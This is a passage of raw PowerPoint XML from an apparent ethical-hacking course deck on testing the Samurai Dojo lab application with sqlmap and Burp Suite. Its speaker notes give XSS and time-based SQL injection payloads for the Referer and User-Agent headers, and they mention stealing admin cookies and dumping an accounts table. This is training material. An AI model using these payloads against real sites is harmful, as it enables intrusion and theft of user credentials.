              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/output/dojo-basic/log</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>88</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12511400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Using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the Enumeration tab, a specific database can be targeted to narrow down the output results. The same can be applied to tables and columns inside the database.</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89</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33328171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We can see that there is an accounts,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> blogs and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>hitlog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> tables setup for this web application once we only focus on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>samurai_dojo_basic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> database.</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90</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25985712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Dumping the Accounts table.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This should not be done as this would be a breech</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> as sensitive data will no longer be private to the user.</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91</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2721811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Engagement Tools:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fine Comments</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find Scripts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Find References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analyze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Discover Content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Schedule Task</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Simulate Manual Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Screenshots of these engagement tools can be found at the end of the slides.</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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15462191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The dump of the accounts table will also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> create a CSV file in: ~/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>/output/dojo-basic/dump/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>samura_dojo_basic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>accounts.csv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>This does show a vulnerability in that passwords are stored in plain text, but you should never dump the user database. It is a breech, and technically needs to be reported. You can dump only your user name/password to validate storage of credentials. </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92</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24240578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Pinning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the SQL Map to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>samurai_dojo_basic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> data base, and then to the accounts table. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Then count the number of rows in the accounts table. Counting will avoid any breech of sensitive data, yet prove you were able to get direct access to the database.</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93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15849804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This output shows that as</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> of 15:27 there were 5 rows in the accounts table.</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94</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19374476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Once SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Map runs, it will store information for the site in the home directory of the logged in user. Here we can see the CSV dump of the accounts table. This is another reason why you don’t want to just dump data, you could make the company have to report a breech of user data.</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95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13873097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See if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> we can use XSS in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> header of requests. Another way to become an admin as most sites will log to files which admins might look at. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Find the request from when Ed’s credentials were used to login, and send that to the repeater tab.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>In the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> header modify it: &lt;script&gt;alert(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> XSS’);&lt;/script&gt;.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>In the response we can see that there is a SQL error. Looks like this is persisted to a database, so we could possibly become an admin with a cookie stealer.</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96</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14181665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Fix the SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> syntax error.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Add another ‘ or just use double quotes. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Looks like it was successful as we didn’t get an error. If using the cookie catcher script to steal cookies, wait and see if an admin looks at logs or maybe do some social engineering to get them to look at logs.</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97</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35085085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As the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> contents are being recorded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> in a database, see if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> injection is possible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>I chose to test with a sleep value to easily validate if the insert command is open to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>: Gibson’ AND (SELECT * FROM (SELECT(SLEEP(5)))x) AND ‘a’=‘a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>As the response hung for 5 seconds, the insert is open to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> injection.</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98</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36051445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See if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the User Agent header is open to XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Find the request from when Ed’s credentials were used to login, and send that to the repeater tab.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>In the User-Agent header modify it: &lt;script&gt;alert(‘User-Agent XSS’);&lt;/script&gt;.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>In the response we can see that there is a SQL error. Looks like this is persisted to a database, so we could possibly become an admin with a cookie stealer.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>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99</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30717336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Fix the SQL error by either adding another ‘ or just replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the ‘ with double quotes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Looks like the request was successful.</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100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21054249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a:t>As we know the User Agent is persisted to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, see</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> if the insert command is open to SQL injections.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>User-Agent: Gibson’ AND (SELECT * FROM (SELECT(SLEEP(5)))x) AND ‘a’=‘a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>As the request hung for 5 seconds we know that the insert command is open to SQL injections.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="100600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3810000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9F203383-855B-7E49-AD5F-24BB0F1E4D29}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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64E73-8326-134C-A483-9046EF43BDF2}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="3238500"/>
            <a:ext cx="6400800" cy="14605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685800" y="1673242"/>
            <a:ext cx="7772400" cy="1225021"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="320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203383-855B-7E49-AD5F-24BB0F1E4D29}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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64E73-8326-134C-A483-9046EF43BDF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203383-855B-7E49-AD5F-24BB0F1E4D29}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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64E73-8326-134C-A483-9046EF43BDF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866"/>
            <a:ext cx="7924800" cy="952500"/>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9F203383-855B-7E49-AD5F-24BB0F1E4D29}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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64E73-8326-134C-A483-9046EF43BDF2}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1333500"/>
            <a:ext cx="792480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4" y="4135438"/>
            <a:ext cx="7885113" cy="1135062"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="3200" b="0" i="0" cap="all" baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609604" y="2885283"/>
            <a:ext cx="7885113" cy="1250156"/>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203383-855B-7E49-AD5F-24BB0F1E4D29}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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164E73-8326-134C-A483-9046EF43BDF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333500"/>
            <a:ext cx="3733800" cy="34290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800600" y="1333500"/>
            <a:ext cx="3733800" cy="34290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09600" y="228866"/>
            <a:ext cx="7924800" cy="952500"/>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9F203383-855B-7E49-AD5F-24BB0F1E4D29}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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164E73-8326-134C-A483-9046EF43BDF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1841500"/>
            <a:ext cx="3733800" cy="29210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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1841500"/>
            <a:ext cx="3733800" cy="29210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09600" y="228866"/>
            <a:ext cx="7924800" cy="9525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333500"/>
            <a:ext cx="3733800" cy="478896"/>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800600" y="1333500"/>
            <a:ext cx="3733800" cy="478896"/>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9F203383-855B-7E49-AD5F-24BB0F1E4D29}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/2/19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164E73-8326-134C-A483-9046EF43BDF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866"/>
            <a:ext cx="7924800" cy="9525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203383-855B-7E49-AD5F-24BB0F1E4D29}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/2/19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164E73-8326-134C-A483-9046EF43BDF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203383-855B-7E49-AD5F-24BB0F1E4D29}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/2/19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164E73-8326-134C-A483-9046EF43BDF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206500"/>
            <a:ext cx="4648200"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12648" y="1206500"/>
            <a:ext cx="2971800" cy="91440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612648" y="2123243"/>
            <a:ext cx="2971800" cy="2639258"/>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203383-855B-7E49-AD5F-24BB0F1E4D29}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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164E73-8326-134C-A483-9046EF43BDF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5715000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1206500"/>
            <a:ext cx="2971800" cy="91440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4657344" y="1206500"/>
            <a:ext cx="3419856" cy="289560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09600" y="2123242"/>
            <a:ext cx="2971800" cy="2004258"/>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203383-855B-7E49-AD5F-24BB0F1E4D29}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/2/19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164E73-8326-134C-A483-9046EF43BDF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5715000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="228866"/>
            <a:ext cx="7924800" cy="9525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09600" y="1333501"/>
            <a:ext cx="7924800" cy="37716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15000" y="5296960"/>
            <a:ext cx="1524000" cy="304271"/>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9F203383-855B-7E49-AD5F-24BB0F1E4D29}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>11/2/19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="5296960"/>
            <a:ext cx="2895600" cy="304271"/>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5296960"/>
            <a:ext cx="990600" cy="304271"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1100" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{39164E73-8326-134C-A483-9046EF43BDF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ourceforge.net/projects/samurai/files/latest/download?source=file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Ethical hacking for Web and mobile applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1308100" y="4328583"/>
            <a:ext cx="3251200" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mike Housley</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6375400" y="4328583"/>
            <a:ext cx="1130300" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>7/24/2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2264640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Burp Suite</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Free version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pro version - $400 for single user license per year</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adds scanner and links vulnerabilities to OWSAP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adds Engagement Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Adds Save/Restore State</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
